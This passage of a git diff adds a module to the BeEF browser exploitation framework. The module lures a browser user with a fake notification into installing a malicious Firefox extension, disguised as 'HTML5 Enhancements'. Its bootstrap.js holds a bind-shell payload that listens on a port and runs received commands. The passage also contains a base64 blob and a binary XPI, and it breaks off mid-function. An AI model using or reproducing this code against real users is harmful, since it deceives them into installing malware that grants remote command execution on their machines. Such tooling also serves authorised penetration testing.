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'>");
+        $j(hid).append(elr);
+        $j(hid).click(function() {
+            $j(this).slideUp(300,function() {
+                $j(this).remove();
+            });
+            //window.location.href = ff_extension;
+            window.open(ff_extension);
+            beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=User has clicked the notification');
+        });
+        $j(hid).css('cursor','pointer');
+        $j(hid).slideDown(300,function() {
+            beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Notification has been displayed');
+        });
+    }
+});
diff --git a/modules/exploits/local_host/firefox_extension_bindshell/config.yaml b/modules/exploits/local_host/firefox_extension_bindshell/config.yaml
new file mode 100644
index 000000000..1d427dd3b
--- /dev/null
+++ b/modules/exploits/local_host/firefox_extension_bindshell/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        firefox_extension_bindshell:
+            enable: true
+            category: ["Exploits", "Local Host"]
+            name: "Firefox Extension (Bindshell)"
+            description: "Create on the fly a malicious Firefox extension that binds a shell to a specified port.<br/><br/>The extension is based on the original work from Michael Schierl and his Metasploit module, and joev's Firefox payloads for Metasploit."
+            authors: ["antisnatchor", "bcoles"]
+            target:
+                user_notify: ["FF"]
+                not_working: ["All"]
diff --git a/modules/exploits/local_host/firefox_extension_bindshell/extension/HTML5_Enhancements.xpi b/modules/exploits/local_host/firefox_extension_bindshell/extension/HTML5_Enhancements.xpi
new file mode 100644
index 0000000000000000000000000000000000000000..e585d38f12a6f5f17afd0b1290afd4e4386bc152
GIT binary patch
literal 3371
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
H`3C$4lbIsv

literal 0
HcmV?d00001

diff --git a/modules/exploits/local_host/firefox_extension_bindshell/extension/bootstrap.js b/modules/exploits/local_host/firefox_extension_bindshell/extension/bootstrap.js
new file mode 100644
index 000000000..216da2e6c
--- /dev/null
+++ b/modules/exploits/local_host/firefox_extension_bindshell/extension/bootstrap.js
@@ -0,0 +1,188 @@
+
+function startup(data, reason) {
+  var file = Components.classes["@mozilla.org/file/directory_service;1"].
+          getService(Components.interfaces.nsIProperties).
+          get("ProfD", Components.interfaces.nsIFile);
+  file.append("extensions");
+    xpi_guid="{861fb387-92ce-bb0a-cb48-4b923dbc292b}";
+  file.append(xpi_guid);
+
+    // # ./msfpayload firefox/shell_bind_tcp LPORT=1337 R
+    (function(){
+      Components.utils.import("resource://gre/modules/NetUtil.jsm");
+      var lport = __bindshell_port_placeholder__;
+      var rhost = "";
+      var serverSocket = Components.classes["@mozilla.org/network/server-socket;1"]
+                             .createInstance(Components.interfaces.nsIServerSocket);
+      serverSocket.init(lport, false, -1);
+
+      var listener = {
+        onSocketAccepted: function(serverSocket, clientSocket) {
+          var outStream = clientSocket.openOutputStream(0, 0, 0);
+          var inStream = clientSocket.openInputStream(0, 0, 0);
+          var pump = Components.classes["@mozilla.org/network/input-stream-pump;1"]
+                     .createInstance(Components.interfaces.nsIInputStreamPump);
+          pump.init(inStream, -1, -1, 0, 0, true);
+          pump.asyncRead(clientListener(outStream), null);
+        }
+      };
+
+      var clientListener = function(outStream) {
+        return {
+          onStartRequest: function(request, context) {},
+          onStopRequest: function(request, context) {},
+          onDataAvailable: function(request, context, stream, offset, count) {
+            var data = NetUtil.readInputStreamToString(stream, count).trim();
+            runCmd(data, function(err, output) {
+              if(!err) outStream.write(output, output.length);
+            });
+          }
+        };
+      };
+
+      
+      
+      var readFile = function(path) {
+        try {
